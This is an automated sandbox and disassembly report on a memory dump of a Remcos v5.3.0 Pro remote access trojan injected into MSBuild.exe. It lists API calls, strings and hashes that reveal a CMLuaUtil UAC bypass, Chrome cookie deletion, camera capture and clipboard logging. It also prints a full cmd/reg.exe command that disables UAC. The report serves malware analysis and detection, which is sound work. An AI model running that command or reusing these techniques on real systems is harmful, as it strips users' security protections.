                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                                                                • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                                                                APIs
                                                                                                • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe), ref: 00406835
                                                                                                  • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                                  • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                • CoUninitialize.OLE32 ref: 0040688E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InitializeObjectUninitialize_wcslen
                                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                • API String ID: 3851391207-1840432179
                                                                                                • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                                • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                                • int.LIBCPMT ref: 0040FEF2
                                                                                                  • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                  • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                • String ID: H]G
                                                                                                • API String ID: 2536120697-1717957184
                                                                                                • Opcode ID: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                                • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                                                                • Opcode Fuzzy Hash: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                                • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                                                                APIs
                                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                                • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                                Strings
                                                                                                • [Chrome Cookies not found], xrefs: 0040B308
                                                                                                • UserProfile, xrefs: 0040B2B4
                                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                                • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteErrorFileLast
                                                                                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                • API String ID: 2018770650-304995407
                                                                                                • Opcode ID: 2f2b76017ea877da9a9f021669f79543ad63569e9aabc20f72a696a2ffc953d7
                                                                                                • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                                                                • Opcode Fuzzy Hash: 2f2b76017ea877da9a9f021669f79543ad63569e9aabc20f72a696a2ffc953d7
                                                                                                • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                                                                APIs
                                                                                                • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                                                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Console$AllocOutputShowWindow
                                                                                                • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                                                • API String ID: 2425139147-2527699604
                                                                                                • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                                • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                                                                • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                                • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$BG
                                                                                                • API String ID: 0-3446331285
                                                                                                • Opcode ID: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
                                                                                                • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                                • Opcode Fuzzy Hash: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
                                                                                                • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                                APIs
                                                                                                • __allrem.LIBCMT ref: 00439789
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                                                                • __allrem.LIBCMT ref: 004397BC
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                                                                • __allrem.LIBCMT ref: 004397F1
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                • String ID:
                                                                                                • API String ID: 1992179935-0
                                                                                                • Opcode ID: e717a979b06a6d59714d5f6060216880ad0b40e6851c78038ac3081c6fc0778a
                                                                                                • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                                                                • Opcode Fuzzy Hash: e717a979b06a6d59714d5f6060216880ad0b40e6851c78038ac3081c6fc0778a
                                                                                                • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __cftoe
                                                                                                • String ID:
                                                                                                • API String ID: 4189289331-0
                                                                                                • Opcode ID: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
                                                                                                • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                                                                • Opcode Fuzzy Hash: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
                                                                                                • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __freea$__alloca_probe_16
                                                                                                • String ID: a/p$am/pm
                                                                                                • API String ID: 3509577899-3206640213
                                                                                                • Opcode ID: 3e928ede4659587d97ed5dfbbe89dc282e212a9f54712889c1654def3b5faaeb
                                                                                                • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                                                                • Opcode Fuzzy Hash: 3e928ede4659587d97ed5dfbbe89dc282e212a9f54712889c1654def3b5faaeb
                                                                                                • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                                  • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: H_prologSleep
                                                                                                • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                                                • API String ID: 3469354165-462540288
                                                                                                • Opcode ID: 0f397e84a234476d91d5a4c8e134a30c98f2e631d09e37a33e2b9d2e1e89063a
                                                                                                • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                                                                • Opcode Fuzzy Hash: 0f397e84a234476d91d5a4c8e134a30c98f2e631d09e37a33e2b9d2e1e89063a
                                                                                                • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                • String ID:
                                                                                                • API String ID: 493672254-0
                                                                                                • Opcode ID: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                                                • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                                                                • Opcode Fuzzy Hash: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                                                • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                                                                • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                • String ID:
                                                                                                • API String ID: 3852720340-0
                                                                                                • Opcode ID: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                                • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                                                                • Opcode Fuzzy Hash: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                                • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                • _free.LIBCMT ref: 00446EF6
                                                                                                • _free.LIBCMT ref: 00446F1E
                                                                                                • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                • _abort.LIBCMT ref: 00446F3D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                • String ID:
                                                                                                • API String ID: 3160817290-0
                                                                                                • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                                                                • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID:
                                                                                                • API String ID: 221034970-0
                                                                                                • Opcode ID: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
                                                                                                • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                                                                • Opcode Fuzzy Hash: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
                                                                                                • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                                                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID:
                                                                                                • API String ID: 221034970-0
                                                                                                • Opcode ID: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
                                                                                                • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                                                                • Opcode Fuzzy Hash: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
                                                                                                • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                                                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID:
                                                                                                • API String ID: 221034970-0
                                                                                                • Opcode ID: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
                                                                                                • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                                                                • Opcode Fuzzy Hash: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
                                                                                                • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                                                                APIs
                                                                                                • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Enum$InfoQueryValue
                                                                                                • String ID: [regsplt]$DG
                                                                                                • API String ID: 3554306468-1089238109
                                                                                                • Opcode ID: b9beffbb743b5d0a6d83e5e9673c714a42b3f29c629c30badf76164a41f06e61
                                                                                                • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                                                                • Opcode Fuzzy Hash: b9beffbb743b5d0a6d83e5e9673c714a42b3f29c629c30badf76164a41f06e61
                                                                                                • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                                APIs
                                                                                                  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                                  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                                                                • API String ID: 2974294136-753205382
                                                                                                • Opcode ID: d8a85142c57b71bd77405a02b73158c59f94f9b5e14c09358a9c1a5aed2895e8
                                                                                                • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                                                                • Opcode Fuzzy Hash: d8a85142c57b71bd77405a02b73158c59f94f9b5e14c09358a9c1a5aed2895e8
                                                                                                • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandleSizeSleep
                                                                                                • String ID: `AG
                                                                                                • API String ID: 1958988193-3058481221
                                                                                                • Opcode ID: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
                                                                                                • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                                • Opcode Fuzzy Hash: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
                                                                                                • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                                                                APIs
                                                                                                • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                • GetLastError.KERNEL32 ref: 0041CA91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                • String ID: 0$MsgWindowClass
                                                                                                • API String ID: 2877667751-2410386613
                                                                                                • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                                                                • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                                                                APIs
                                                                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                                • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                                • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                                Strings
                                                                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                                • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$CreateProcess
                                                                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                • API String ID: 2922976086-4183131282
                                                                                                • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                                                                • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
